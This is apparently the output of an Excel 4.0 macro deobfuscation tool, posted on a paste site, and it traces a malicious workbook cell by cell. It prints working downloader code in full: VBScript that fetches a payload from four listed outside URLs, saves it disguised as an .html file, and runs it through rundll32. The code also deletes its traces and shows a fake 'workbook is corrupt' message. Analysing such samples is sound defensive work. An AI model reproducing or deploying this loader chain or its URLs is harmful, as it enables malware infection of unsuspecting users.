- CELL:ID13933 , FullEvaluation , [FALSE]
- CELL:ID13934 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
- CELL:ID13935 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13936 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
- CELL:ID13937 , FullEvaluation , IF(R13935C238<40000,,GOTO(R13940C238))
- CELL:ID13938 , FullEvaluation , "https://joliroomlides.tk/wp-keys.php"
- CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
- CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:FX20053 , FullEvaluation , [FALSE] GOTO(R47050C49)
- CELL:AW47050 , FullEvaluation , "=""C:\Users\Public\Clmu.html"""
- CELL:AW47051 , FullEvaluation , "=""C:\Users\Public\yP20iC8.vbs"""
- CELL:AW47052 , FullEvaluation , "=FOPEN(R2837C133,3)"
- CELL:AW47053 , FullEvaluation , "=FWRITELN(R2838C133,""whEoqhq = """"https://thepsaokhue.com/wp-keys.php"""""")"
- CELL:AW47054 , FullEvaluation , "=FWRITELN(R2838C133,""hiH = """"https://metagro.com.br/wp-keys.php"""""")"
- CELL:AW47055 , FullEvaluation , "=FWRITELN(R2838C133,""MQcR = """"https://loughturnperceidrin.ml/wp-keys.php"""""")"
- CELL:AW47056 , FullEvaluation , "=FWRITELN(R2838C133,""Ui5zK = """"https://joliroomlides.tk/wp-keys.php"""""")"
- CELL:AW47057 , FullEvaluation , "=FWRITELN(R2838C133,""u4d = Array(whEoqhq,hiH,MQcR,Ui5zK)"")"
- CELL:AW47058 , FullEvaluation , "=FWRITELN(R2838C133,""Dim YB0zXti: Set YB0zXti = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
- CELL:AW47059 , FullEvaluation , "=FWRITELN(R2838C133,""Function m987(data):"")"
- CELL:AW47060 , FullEvaluation , "=FWRITELN(R2838C133,""YB0zXti.setOption(2) = 13056"")"
- CELL:AW47061 , FullEvaluation , "=FWRITELN(R2838C133,""YB0zXti.Open """"GET"""", data, False"")"
- CELL:AW47062 , FullEvaluation , "=FWRITELN(R2838C133,""YB0zXti.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
- CELL:AW47063 , FullEvaluation , "=FWRITELN(R2838C133,""YB0zXti.Send"")"
- CELL:AW47064 , FullEvaluation , "=FWRITELN(R2838C133,""m987 = YB0zXti.Status"")"
- CELL:AW47065 , FullEvaluation , "=FWRITELN(R2838C133,""End Function"")"
- CELL:AW47066 , FullEvaluation , "=FWRITELN(R2838C133,""For Each G2lS in u4d"")"
- CELL:AW47067 , FullEvaluation , "=FWRITELN(R2838C133,""If m987(G2lS) = 200 Then"")"
- CELL:AW47068 , FullEvaluation , "=FWRITELN(R2838C133,""Dim Txq2NpoZ: Set Txq2NpoZ = CreateObject(""""ADODB.Stream"""")"")"
- CELL:AW47069 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.Open"")"
- CELL:AW47070 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.Type = 1"")"
- CELL:AW47071 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.Write YB0zXti.ResponseBody"")"
- CELL:AW47072 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.SaveToFile """"""&R2836C133&"""""", 2"")"
- CELL:AW47073 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.Close"")"
- CELL:AW47074 , FullEvaluation , "=FWRITELN(R2838C133,""Exit For"")"
- CELL:AW47075 , FullEvaluation , "=FWRITELN(R2838C133,""End If"")"
- CELL:AW47076 , FullEvaluation , "=FWRITELN(R2838C133,""Next"")"
- CELL:AW47077 , FullEvaluation , "=FCLOSE(R2838C133)"
- CELL:AW47078 , FullEvaluation , "=EXEC(""explorer.exe ""&R2837C133&"""")"
- CELL:AW47079 , FullEvaluation , "=WHILE(ISERROR(FILES(R2836C133)))"
- CELL:AW47080 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
- CELL:AW47081 , FullEvaluation , "=NEXT()"
- CELL:AW47082 , FullEvaluation , "=FILE.DELETE(R2837C133)"
- CELL:AW47083 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
- CELL:AW47084 , FullEvaluation , "=""C:\Users\Public\ZCC9G.vbs"""
- CELL:AW47085 , FullEvaluation , "=FOPEN(R2870C133,3)"
- CELL:AW47086 , FullEvaluation , "=""rundll32.exe"""
- CELL:AW47087 , FullEvaluation , "=R2836C133&"",DllRegisterServer"""
- CELL:AW47088 , FullEvaluation , "=""C:\Windows\System32"""
- CELL:AW47089 , FullEvaluation , "=FWRITELN(R2871C133,""Set vvaK = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
- CELL:AW47090 , FullEvaluation , "=FWRITELN(R2871C133,""vvaK.Document.Application.ShellExecute """"""&R2872C133&"""""",""""""&R2873C133&"""""",""""""&R2874C133&"""""",Null,0"")"
- CELL:AW47091 , FullEvaluation , "=FCLOSE(R2871C133)"
- CELL:AW47092 , FullEvaluation , "=EXEC(""explorer.exe ""&R2870C133&"""")"
- CELL:AW47093 , FullEvaluation , "=GOTO(R20022C180)"
- CELL:AW47094 , FullEvaluation , ON.TIME(2020-06-22 11:29:18.429305,'rtNGOD1P843zMOPdOj'!DG874)
- CELL:DG874 , FullEvaluation , FORMULA("=FORMULA(R[46175]C[-62],R[1961]C[22])",rtNGOD1P843zMOPdOj$DG$875:$DG$918)
- CELL:DG875 , FullEvaluation , FORMULA("=""C:\Users\Public\Clmu.html""",R[1961]C[22])
- CELL:DG876 , FullEvaluation , FORMULA("=""C:\Users\Public\yP20iC8.vbs""",R[1961]C[22])
- CELL:DG877 , FullEvaluation , FORMULA("=FOPEN(R2837C133,3)",R[1961]C[22])
- CELL:DG878 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""whEoqhq = """"https://thepsaokhue.com/wp-keys.php"""""")",R[1961]C[22])
- CELL:DG879 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""hiH = """"https://metagro.com.br/wp-keys.php"""""")",R[1961]C[22])
- CELL:DG880 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""MQcR = """"https://loughturnperceidrin.ml/wp-keys.php"""""")",R[1961]C[22])
- CELL:DG881 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Ui5zK = """"https://joliroomlides.tk/wp-keys.php"""""")",R[1961]C[22])
- CELL:DG882 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""u4d = Array(whEoqhq,hiH,MQcR,Ui5zK)"")",R[1961]C[22])
- CELL:DG883 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Dim YB0zXti: Set YB0zXti = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")",R[1961]C[22])
- CELL:DG884 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Function m987(data):"")",R[1961]C[22])
- CELL:DG885 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""YB0zXti.setOption(2) = 13056"")",R[1961]C[22])
- CELL:DG886 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""YB0zXti.Open """"GET"""", data, False"")",R[1961]C[22])
- CELL:DG887 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""YB0zXti.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")",R[1961]C[22])
- CELL:DG888 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""YB0zXti.Send"")",R[1961]C[22])
- CELL:DG889 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""m987 = YB0zXti.Status"")",R[1961]C[22])
- CELL:DG890 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""End Function"")",R[1961]C[22])
- CELL:DG891 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""For Each G2lS in u4d"")",R[1961]C[22])
- CELL:DG892 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""If m987(G2lS) = 200 Then"")",R[1961]C[22])
- CELL:DG893 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Dim Txq2NpoZ: Set Txq2NpoZ = CreateObject(""""ADODB.Stream"""")"")",R[1961]C[22])
- CELL:DG894 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.Open"")",R[1961]C[22])
- CELL:DG895 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.Type = 1"")",R[1961]C[22])
- CELL:DG896 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.Write YB0zXti.ResponseBody"")",R[1961]C[22])
- CELL:DG897 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.SaveToFile """"""&R2836C133&"""""", 2"")",R[1961]C[22])
- CELL:DG898 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.Close"")",R[1961]C[22])
- CELL:DG899 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Exit For"")",R[1961]C[22])
- CELL:DG900 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""End If"")",R[1961]C[22])
- CELL:DG901 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Next"")",R[1961]C[22])
- CELL:DG902 , FullEvaluation , FORMULA("=FCLOSE(R2838C133)",R[1961]C[22])
- CELL:DG903 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R2837C133&"""")",R[1961]C[22])
- CELL:DG904 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R2836C133)))",R[1961]C[22])
- CELL:DG905 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[1961]C[22])
- CELL:DG906 , FullEvaluation , FORMULA("=NEXT()",R[1961]C[22])
- CELL:DG907 , FullEvaluation , FORMULA("=FILE.DELETE(R2837C133)",R[1961]C[22])
- CELL:DG908 , FullEvaluation , FORMULA("=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")",R[1961]C[22])
- CELL:DG909 , FullEvaluation , FORMULA("=""C:\Users\Public\ZCC9G.vbs""",R[1961]C[22])
- CELL:DG910 , FullEvaluation , FORMULA("=FOPEN(R2870C133,3)",R[1961]C[22])
- CELL:DG911 , FullEvaluation , FORMULA("=""rundll32.exe""",R[1961]C[22])
- CELL:DG912 , FullEvaluation , FORMULA("=R2836C133&"",DllRegisterServer""",R[1961]C[22])
- CELL:DG913 , FullEvaluation , FORMULA("=""C:\Windows\System32""",R[1961]C[22])
- CELL:DG914 , FullEvaluation , FORMULA("=FWRITELN(R2871C133,""Set vvaK = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")",R[1961]C[22])
- CELL:DG915 , FullEvaluation , FORMULA("=FWRITELN(R2871C133,""vvaK.Document.Application.ShellExecute """"""&R2872C133&"""""",""""""&R2873C133&"""""",""""""&R2874C133&"""""",Null,0"")",R[1961]C[22])
- CELL:DG916 , FullEvaluation , FORMULA("=FCLOSE(R2871C133)",R[1961]C[22])
- CELL:DG917 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R2870C133&"""")",R[1961]C[22])
- CELL:DG918 , FullEvaluation , FORMULA("=GOTO(R20022C180)",R[1961]C[22])
- CELL:DG919 , FullEvaluation , ON.TIME(2020-06-22 11:29:18.454290,'rtNGOD1P843zMOPdOj'!EC2836)
- CELL:EC2836 , FullEvaluation , "C:\Users\Public\Clmu.html"
- CELL:EC2837 , FullEvaluation , "C:\Users\Public\yP20iC8.vbs"
- CELL:EC2838 , FullEvaluation , FOPEN("C:\Users\Public\yP20iC8.vbs",3)
- CELL:EC2839 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","whEoqhq = ""https://thepsaokhue.com/wp-keys.php""")
- CELL:EC2840 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","hiH = ""https://metagro.com.br/wp-keys.php""")
- CELL:EC2841 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","MQcR = ""https://loughturnperceidrin.ml/wp-keys.php""")
- CELL:EC2842 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Ui5zK = ""https://joliroomlides.tk/wp-keys.php""")
- CELL:EC2843 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","u4d = Array(whEoqhq,hiH,MQcR,Ui5zK)")
- CELL:EC2844 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Dim YB0zXti: Set YB0zXti = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")
- CELL:EC2845 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Function m987(data):")
- CELL:EC2846 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","YB0zXti.setOption(2) = 13056")
- CELL:EC2847 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","YB0zXti.Open ""GET"", data, False")
- CELL:EC2848 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","YB0zXti.setRequestHeader ""User-Agent"", ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")
- CELL:EC2849 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","YB0zXti.Send")
- CELL:EC2850 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","m987 = YB0zXti.Status")
- CELL:EC2851 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","End Function")
- CELL:EC2852 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","For Each G2lS in u4d")
- CELL:EC2853 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","If m987(G2lS) = 200 Then")
- CELL:EC2854 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Dim Txq2NpoZ: Set Txq2NpoZ = CreateObject(""ADODB.Stream"")")
- CELL:EC2855 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.Open")
- CELL:EC2856 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.Type = 1")
- CELL:EC2857 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.Write YB0zXti.ResponseBody")
- CELL:EC2858 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.SaveToFile ""C:\Users\Public\Clmu.html"", 2")
- CELL:EC2859 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.Close")
- CELL:EC2860 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Exit For")
- CELL:EC2861 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","End If")
- CELL:EC2862 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Next")
- CELL:EC2863 , PartialEvaluation , FCLOSE("C:\Users\Public\yP20iC8.vbs")
- CELL:EC2864 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\yP20iC8.vbs")
- CELL:EC2865 , PartialEvaluation , WHILE(ISERROR(FILES(R2836C133)))
- CELL:EC2868 , PartialEvaluation , FILE.DELETE("C:\Users\Public\yP20iC8.vbs")
- CELL:EC2869 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.")
- CELL:EC2870 , FullEvaluation , "C:\Users\Public\ZCC9G.vbs"
- CELL:EC2871 , FullEvaluation , FOPEN("C:\Users\Public\ZCC9G.vbs",3)
- CELL:EC2872 , FullEvaluation , "rundll32.exe"
- CELL:EC2873 , FullEvaluation , "C:\Users\Public\Clmu.html,DllRegisterServer"
- CELL:EC2874 , FullEvaluation , "C:\Windows\System32"
- CELL:EC2875 , FullEvaluation , FWRITE("C:\Users\Public\ZCC9G.vbs","Set vvaK = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")
- CELL:EC2876 , FullEvaluation , FWRITE("C:\Users\Public\ZCC9G.vbs","vvaK.Document.Application.ShellExecute ""rundll32.exe"",""C:\Users\Public\Clmu.html,DllRegisterServer"",""C:\Windows\System32"",Null,0")
- CELL:EC2877 , PartialEvaluation , FCLOSE("C:\Users\Public\ZCC9G.vbs")
- CELL:EC2878 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\ZCC9G.vbs")
- CELL:EC2879 , FullEvaluation , GOTO(R20022C180)
- CELL:FX20022 , End , CLOSE(FALSE)
- CELL:FX20032 , FullEvaluation , [FALSE] GOTO(R20022C180)
- CELL:FX20022 , End , CLOSE(FALSE)
- Files:
- Files: path C:\Users\Public\Oyi.vbs, access 3
- On Error Resume Next
- Set fqaeA = CreateObject("WScript.Shell")
- Set YtU9AS = CreateObject("Scripting.FileSystemObject")
- Set pZ93bgn = YtU9AS.CreateTextFile("C:\Users\Public\a8FML.txt", True)
- pZ93bgn.WriteLine(fqaeA.RegRead("HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings"))
- pZ93bgn.Close
- Files: path C:\Users\Public\yP20iC8.vbs, access 3
- whEoqhq = "https://thepsaokhue.com/wp-keys.php"
- hiH = "https://metagro.com.br/wp-keys.php"
- MQcR = "https://loughturnperceidrin.ml/wp-keys.php"
- Ui5zK = "https://joliroomlides.tk/wp-keys.php"
- u4d = Array(whEoqhq,hiH,MQcR,Ui5zK)
- Dim YB0zXti: Set YB0zXti = CreateObject("MSXML2.ServerXMLHTTP.6.0")
- Function m987(data):
- YB0zXti.setOption(2) = 13056
- YB0zXti.Open "GET", data, False
- YB0zXti.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
- YB0zXti.Send
- m987 = YB0zXti.Status
- End Function
- For Each G2lS in u4d
- If m987(G2lS) = 200 Then
- Dim Txq2NpoZ: Set Txq2NpoZ = CreateObject("ADODB.Stream")
- Txq2NpoZ.Open
- Txq2NpoZ.Type = 1
- Txq2NpoZ.Write YB0zXti.ResponseBody
- Txq2NpoZ.SaveToFile "C:\Users\Public\Clmu.html", 2
- Txq2NpoZ.Close
- Exit For
- End If
- Next
- Files: path C:\Users\Public\ZCC9G.vbs, access 3
- Set vvaK = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
- vvaK.Document.Application.ShellExecute "rundll32.exe","C:\Users\Public\Clmu.html,DllRegisterServer","C:\Windows\System32",Null,0
- [END of Deobfuscation]
- time elapsed: 4.536201238632202
- Process finished with exit code 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement